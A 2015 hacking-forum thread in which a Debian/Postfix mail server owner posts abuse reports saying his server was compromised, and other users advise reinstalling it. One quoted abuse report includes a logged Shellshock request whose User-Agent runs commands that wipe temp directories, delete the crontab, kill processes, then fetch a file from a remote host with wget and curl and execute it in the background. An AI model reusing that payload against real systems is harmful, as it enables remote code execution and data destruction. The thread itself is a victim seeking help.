EvilZone

Hacking and Security => Hacking and Security => : dendic May 03, 2015, 08:31:16 AM

: mail server attack
: dendic May 03, 2015, 08:31:16 AM

I received next message.Please little explain of my problem  and what can I do with my mail server (postfix,debian) to protect all? ( I have spamassasin on mail server)



From: chopper boy <choprboy@hotmail.com>
Date: 2015-04-29 9:55 GMT+02:00
Subject: Compromised server / Exploit attempts
To: "abuse@xxx.com




Compromised server / Exploit attempts




Exploit attempts via bash variable push. Downloads bash script which
installs backdoor Trojan.Hacktool.Linux.Bf.E and starts additional exploit
scans against other servers.


Compromised server:
5.135.167.145
xxx.xxx.xxx.xxx (IP -mog servera)


Exploit bash scripts:
http://xxx.xxx.xxx.xxx/i.gif
http://xxx.xxx.xxx.xxx/nynew54.gif


Exploit scans address lists:
http://198.27.67.24/news/<xxx>
http://198.27.67.24/download/<xxx>






5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400
304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
/tmp/* ; rm -rf /var/tmp/* ; crontab -r ; killall -9 wget curl lwp-download
b f r xx y i.gif print start pscan pnscan ps ; wget
http://xxx.xxx.xxx.xxx/i.gif ; curl -O http://xxx.xxx.xxx.xxx/i.gif ; chmod +x
i.gif ; nohup ./i.gif &
\");'"

: Re: mail server attack
: proxx May 03, 2015, 09:47:52 AM

Please give more information about the situation , thus far it is not clear.
From the looks of it from what I can tell your server has been compromised and it is attacking other boxes.
Best bet is to setup another box since it is very hard to tell if you have rootkits.

: Re: mail server attack
: dendic May 03, 2015, 02:59:42 PM

what kind of protection to install and how to clean up the my mail server

From: Christopher Ravnborg <cr@rackhosting.com (https://mail.pincom.net/squirrelmail/src/compose.php?send_to=cr%40rackhosting.com)> Date: 2015-04-29 10:34 GMT+02:00 Subject: xxx.xxx.xxx.xxx hosting malicious content To: ivanxx@mydomain.net (https://mail.pincom.net/squirrelmail/src/compose.php?send_to=robert.bosnjak%40pincom.net) Cc: "abuse@rackhosting.com (https://mail.pincom.net/squirrelmail/src/compose.php?send_to=abuse%40rackhosting.com)" <abuse@rackhosting.com (https://mail.pincom.net/squirrelmail/src/compose.php?send_to=abuse%40rackhosting.com)> Hello, xxx.xxx.xxx.xxx is hosting malicious content in form os bruteforce and/or DDoS tools. http://xxx.xxx.xxx.xxx/i.gif (http://80.71.144.4/i.gif) shellcode http://xxx.xxx.xxx.xxx/nynew54.gif (http://80.71.144.4/nynew54.gif) tar archive. Please handle this issue. -- Med venlig hilsen / Best regards Christopher Ravnborg Rackhosting.com ApS

: Re: mail server attack
: proxx May 03, 2015, 03:08:55 PM

As I said I suggested you just do a fresh install and keep auto updates on.
Migrating the mail DB shouldnt be that hard.

: Re: mail server attack
: iTpHo3NiX May 03, 2015, 08:57:05 PM

Also remove those gifts considering they're the malicious payload...